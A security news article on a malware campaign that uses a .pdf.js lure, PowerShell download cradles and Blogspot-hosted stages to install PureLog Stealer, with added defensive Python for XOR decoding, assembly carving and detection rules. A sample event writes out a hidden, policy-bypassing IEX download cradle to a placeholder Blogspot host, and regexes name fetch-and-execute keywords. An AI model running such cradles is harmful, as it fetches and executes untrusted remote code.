Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Stealer

Source: Cyber Security News (cybersecuritynews.com)


Hackers have found a way to sneak data-stealing malware onto victims' computers by staging their payloads on a trusted platform, Google's Blogspot, so the downloads blend in with ordinary web traffic.

Researchers recently uncovered a campaign abusing this blogging service alongside native Windows tools to quietly install an information stealer known as PureLog Stealer.

The attack begins with something deceptively simple. A file named transcript.pdf.js looks like an ordinary PDF at first glance, but Windows acts only on the final extension: .js is associated with Windows Script Host, which runs the file as JScript.

Because Windows Explorer hides known file extensions by default, victims see only transcript.pdf and have little reason to suspect anything is wrong.

Once opened, the file runs through Windows Script Host and immediately launches PowerShell with the execution policy bypassed. Execution policy is not a security boundary (Microsoft documents it as a safety feature against accidental script execution), so the switch removes friction rather than defeating a control, but -ExecutionPolicy Bypass on a command line is still a useful detection signal.

From there, PowerShell reaches out to attacker-controlled Blogspot pages to fetch the next stages, without saving a suspicious file to disk.

Researchers from Securonix said in a report shared with Cyber Security News (CSN) that they identified and documented this framework, naming it Veil#Drop for the way it conceals activity behind layers of encoding and legitimate-looking web traffic.

Hidden file extension masking transcript.pdf.js as a PDF in Windows Explorer (Source – Securonix)

Their analysis traced the chain from the first click to the final theft of browser passwords and cryptocurrency wallet data.

The campaign stands out because each step looks ordinary on its own. PowerShell commands, Blogspot visits, and trusted Microsoft utilities are things security teams see every day, which is why the chain slips past signature-based antivirus so easily.

The chain starts with a compromised website hosting the fake document. Once a victim double-clicks transcript.pdf.js, Windows Script Host runs the script, which spawns PowerShell with the execution policy bypassed for that process only.

PowerShell then uses a download cradle: a one-liner that fetches code from a Blogspot page (for example through Net.WebClient or Invoke-WebRequest) and hands it straight to Invoke-Expression, so it runs in memory. Nothing is written to disk at this stage, so file-scanning tools never inspect it; AMSI and PowerShell script block logging, where enabled, still see the script text as it executes.

PowerShell execution policy bypass scoped to the current process (Source – Securonix)

The retrieved file, a PowerShell loader named phud.dudus.docx.pdf.olp.sys, deletes the original JScript launcher to remove evidence and kills background processes that might interfere with later stages. It also decrypts an embedded payload with a repeating-key XOR.

That decrypted script builds a new Blogspot address on the fly, adding random characters so each infection looks different. This defeats blocklists of exact hostnames, although every variant still sits under blogspot.com, so PowerShell egress to that parent domain remains a usable signal.
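The repeating-key XOR step above, as an added example that is not Securonix's code or the Veil#Drop loader: a Python decoder that recovers the key by crib-dragging a known plaintext fragment across the encrypted blob. It assumes the decrypted stage is ASCII text containing "blogspot.com" (the report says the stage builds a Blogspot URL) and that the key is no longer than the crib; the sample plaintext, key and ciphertext are constructed here for the demo.

```python
"""Repeating-key XOR stage decoder with crib-based key recovery.

Added example, not the Veil#Drop loader. Assumptions: the blob is XORed
with a short repeating key, the decrypted stage is ASCII text, and it
contains a known substring (the crib). Sample data below is constructed.
"""
from itertools import cycle
from typing import Optional, Tuple


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed.
    The operation is its own inverse, so it both encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_text(data: bytes) -> bool:
    """True when every byte is printable ASCII or tab/CR/LF."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def recover_key(blob: bytes, crib: bytes, max_key_len: int = 0) -> Optional[Tuple[bytes, int]]:
    """Crib-drag a known plaintext substring across the blob.

    For each key length L (1..len(crib), capped by max_key_len) and each
    offset, derive key[(offset + j) % L] = blob[offset + j] ^ crib[j].
    A crib at least as long as the key constrains every key byte, and any
    key position derived twice must agree; a candidate is accepted only if
    it decodes the entire blob to text. Returns (key, crib offset) or None.
    Keys longer than the crib cannot be fully recovered this way.
    """
    max_key_len = min(max_key_len or len(crib), len(crib))
    for key_len in range(1, max_key_len + 1):
        for off in range(len(blob) - len(crib) + 1):
            key = [None] * key_len
            consistent = True
            for j, p in enumerate(crib):
                idx = (off + j) % key_len
                k = blob[off + j] ^ p
                if key[idx] is None:
                    key[idx] = k
                elif key[idx] != k:
                    consistent = False
                    break
            if not consistent or None in key:
                continue
            candidate = bytes(key)
            if looks_like_text(xor_repeating(blob, candidate)):
                return candidate, off
    return None


# Constructed stand-in for the decrypted stage (NOT the real script): a
# PowerShell fragment that assembles a randomised Blogspot hostname.
SAMPLE_STAGE = (
    b"$tag = -join ((48..57 + 97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})\r\n"
    b"$url = 'https://' + $tag + 'example.blogspot.com/next.sys'\r\n"
    b"Write-Output $url\r\n"
)
SAMPLE_KEY = bytes([0x5A, 0x13, 0x77, 0xC2, 0x08, 0x9E, 0x41])  # constructed 7-byte key
SAMPLE_BLOB = xor_repeating(SAMPLE_STAGE, SAMPLE_KEY)            # what an analyst would carve

if __name__ == "__main__":
    found = recover_key(SAMPLE_BLOB, b"blogspot.com")
    if found is None:
        raise SystemExit("key not recovered; crib absent or key longer than crib")
    key, offset = found
    print("key:", key.hex(), "crib found at offset", offset)
    print(xor_repeating(SAMPLE_BLOB, key).decode("ascii"))
```

The consistency check is what makes the search decisive: a wrong offset or key length almost never yields the same key byte for two positions that share a residue, and the full-blob text check rejects the rare coincidence. If the crib is shorter than the key, only the covered key bytes are learned, so cap the key length or extend the crib with another string the stage is known to contain.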

The newly fetched file, niple.docx.odp.pdf.sys, carries two large blocks of encoded numeric data. These decode into working .NET assemblies that are loaded directly into memory through reflection (typically [System.Reflection.Assembly]::Load on the decoded byte array), so no executable ever touches the disk.
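Carving the embedded assemblies out of those numeric blocks, as an added example rather than the report's tooling: pull every comma-separated run of decimal byte values out of a script and walk the PE header far enough to tell whether each blob is a managed .NET image (the CLR runtime header, data directory 14, is non-zero). The script text and the header-only fake assembly are constructed here; the 64-value threshold and the variable names are assumptions.

```python
"""Carve PE/.NET assemblies from decimal byte arrays embedded in a script.

Added example, not the report's tooling. Sample script and fake assembly
below are constructed; the fake image is header-only and not loadable.
"""
import re
import struct
from typing import List

# A run of at least 64 comma-separated 1-3 digit numbers (whitespace allowed).
NUMERIC_ARRAY = re.compile(r"\b\d{1,3}(?:\s*,\s*\d{1,3}){63,}\b")


def extract_numeric_blobs(script: str) -> List[bytes]:
    """Return each qualifying numeric array as bytes, skipping runs with values > 255."""
    blobs = []
    for m in NUMERIC_ARRAY.finditer(script):
        values = [int(v) for v in m.group(0).split(",")]
        if all(0 <= v <= 255 for v in values):
            blobs.append(bytes(values))
    return blobs


def classify_blob(blob: bytes) -> dict:
    """Minimal PE header walk: MZ -> e_lfanew -> PE\\0\\0 -> optional header ->
    data directory 14 (CLR runtime header). A non-zero CLR directory marks a
    managed assembly, the kind Assembly.Load accepts from memory."""
    info = {"size": len(blob), "pe": False, "managed": False, "machine": None, "pe32plus": None}
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    machine = struct.unpack_from("<H", blob, e_lfanew + 4)[0]
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    if opt + 2 > len(blob):
        return info
    magic = struct.unpack_from("<H", blob, opt)[0]
    pe32plus = magic == 0x20B
    info.update(pe=True, machine=machine, pe32plus=pe32plus)
    dd = opt + (112 if pe32plus else 96)      # data directories start here
    n_dirs_off = dd - 4                       # NumberOfRvaAndSizes sits just before them
    if n_dirs_off + 4 > len(blob):
        return info
    n_dirs = struct.unpack_from("<I", blob, n_dirs_off)[0]
    clr_off = dd + 14 * 8
    if n_dirs > 14 and clr_off + 8 <= len(blob):
        rva, size = struct.unpack_from("<II", blob, clr_off)
        info["managed"] = rva != 0 and size != 0
    return info


def build_fake_managed_pe() -> bytes:
    """Constructed header-only PE32 image that parses as a .NET assembly."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew -> right after DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                         # standard PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)      # CLR header RVA and size
    return bytes(dos) + coff + bytes(opt)


FAKE_ASSEMBLY = build_fake_managed_pe()
FAKE_CONFIG = bytes((i * 7) % 256 for i in range(96))           # constructed non-PE filler

# Constructed stand-in for a loader script that embeds data as decimal arrays.
SAMPLE_SCRIPT = (
    "# constructed sample, not the real loader\n"
    "[byte[]]$cfg = " + ",".join(map(str, FAKE_CONFIG)) + "\n"
    "[byte[]]$asm = " + ",".join(map(str, FAKE_ASSEMBLY)) + "\n"
    "[System.Reflection.Assembly]::Load($asm) | Out-Null\n"
)

if __name__ == "__main__":
    for n, blob in enumerate(extract_numeric_blobs(SAMPLE_SCRIPT)):
        print(n, classify_blob(blob))
```

Dump any blob that classifies as managed to disk under a safe name and hand it to a .NET decompiler; for a real sample, also try the same carve after base64 or XOR decoding, since loaders often stack encodings.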

If that approach fails, the malware falls back on Microsoft-signed utilities such as InstallUtil, MSBuild, RegSvcs, and csc.exe (the C# compiler), which run attacker code on the malware's behalf while appearing as trusted binaries that application allow-lists often permit.

What PureLog Stealer Does Next

Once active, PureLog Stealer harvests whatever valuable data it can find, including saved browser passwords, cookies, autofill entries, browsing history, and cryptocurrency wallet details.

The stealer also gathers information about the infected system, giving attackers a clearer picture of what they compromised. This happens quietly, often without any visible sign that something is wrong.

Because the chain runs from memory and avoids writing files, file-based antivirus scans can easily miss it. Security teams are better served watching behavior, such as a script host spawning PowerShell, PowerShell reaching out to Blogspot, or PowerShell spawning build and installer tools it would not normally touch.

The embedded XOR-encoded payload and its runtime decryption routine (Source – Securonix)

Researchers recommend restricting which scripts Windows Script Host can run, especially where it serves no business purpose; WSH can be disabled outright by setting the Enabled value to 0 under HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings (or the HKCU equivalent), or the .js/.jse/.vbs file associations can be pointed at Notepad so a double-click opens the source instead of running it. Turning on PowerShell script block logging (Event ID 4104) and module logging, and alerting on -ExecutionPolicy Bypass in process command lines, can catch this activity early.

Monitoring outbound connections to trusted cloud platforms for unusual patterns (PowerShell as the initiating process, throwaway subdomains, payload-like file names in the URL) rather than relying purely on domain reputation gives defenders a better chance of spotting this abuse. Application control and least privilege further reduce the odds that the signed-utility fallback succeeds.
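The behavioral watchpoints above (script host spawning PowerShell, PowerShell egress to Blogspot, PowerShell spawning signed build and installer tools) as executable rules, added here as an example and not Securonix detection content. The rules run over constructed events shaped loosely like Sysmon Event ID 1 (process creation) and Event ID 3 (network connection) records; the field names, the sample hostnames and the command lines are assumptions.

```python
"""Behavioural rules for a WSH -> PowerShell -> Blogspot -> LOLBin chain.

Added example, not vendor detection content. Events are dicts with
Sysmon-like fields (EventID, Image, ParentImage, CommandLine,
DestinationHostname); sample events below are constructed.
"""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Signed Microsoft utilities the report names as fallback loaders.
LOLBINS = {"installutil.exe", "msbuild.exe", "regsvcs.exe", "csc.exe"}

EP_BYPASS = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
FETCH = re.compile(r"downloadstring|downloadfile|downloaddata|net\.webclient|"
                   r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I)
EXECUTE = re.compile(r"invoke-expression|\biex\b", re.I)
BLOGSPOT = re.compile(r"(?:^|\.)blogspot\.com$", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Return one alert dict per (event index, rule) that fires."""
    alerts = []
    for i, ev in enumerate(events):
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        if ev.get("EventID") == 1:
            if parent in SCRIPT_HOSTS and image in POWERSHELL:
                alerts.append({"index": i, "rule": "script_host_spawns_powershell"})
            # Fetch plus either in-memory execution or an execution policy bypass.
            if image in POWERSHELL and FETCH.search(cmd) and (EXECUTE.search(cmd) or EP_BYPASS.search(cmd)):
                alerts.append({"index": i, "rule": "powershell_download_cradle"})
            if parent in POWERSHELL and image in LOLBINS:
                alerts.append({"index": i, "rule": "lolbin_child_of_powershell"})
        elif ev.get("EventID") == 3:
            if image in POWERSHELL and BLOGSPOT.search(ev.get("DestinationHostname", "")):
                alerts.append({"index": i, "rule": "powershell_blogspot_egress"})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSH = r"C:\Windows\System32\wscript.exe"

# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": WSH, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\transcript.pdf.js"'},
    {"EventID": 1, "Image": PS, "ParentImage": WSH,
     "CommandLine": "powershell.exe -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://abc123.blogspot.com/stage')\""},
    {"EventID": 3, "Image": PS, "DestinationHostname": "abc123.blogspot.com", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "ParentImage": PS, "CommandLine": r"InstallUtil.exe /U C:\Users\u\AppData\Local\Temp\a.dll"},
    # Benign: an admin running an inline command, and a browser reading a blog.
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 3, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "www.blogspot.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["index"], alert["rule"])
```

The egress rule matches on the parent domain rather than the exact host, which is what makes it robust to the randomised subdomains the loader generates; tune the benign list (developer machines legitimately run MSBuild and csc.exe from build scripts, though rarely as children of an interactive PowerShell spawned by wscript.exe) before deploying any of these as alerting rules.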

This framework shows a deliberate effort to slip past antivirus products and detection systems throughout the attack.

Awareness remains one of the strongest defenses given how ordinary each step looks on its own. Employees should stay cautious about unexpected downloads bearing double extensions like those seen throughout this campaign, and enabling "File name extensions" in Explorer makes the trailing .js visible in the first place.

Indicators of Compromise (IoCs):

Type      Indicator                                                              Description
Filename  transcript.pdf.js                                                      Initial JavaScript launcher disguised as a PDF document
Filename  phud.dudus.docx.pdf.olp.sys                                            Second-stage PowerShell loader retrieved from Blogspot
Filename  niple.docx.odp.pdf.sys                                                 Third-stage loader containing encoded PureLog Stealer assemblies
Domain    htlwub00klocate[.]blogspot[.]com                                       Blogspot domain used to stage the second-stage payload
Domain    cpyzaramay26[.]blogspot[.]com                                          Blogspot domain used to stage the third-stage payload
URL       hxxps://htlwub00klocate[.]blogspot[.]com/phud.dudus.docx.pdf.olp.sys   URL delivering the second-stage PowerShell loader
URL       hxxps://cpyzaramay26[.]blogspot[.]com/niple.docx.odp.pdf.sys           URL delivering the final-stage loader for PureLog Stealer

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
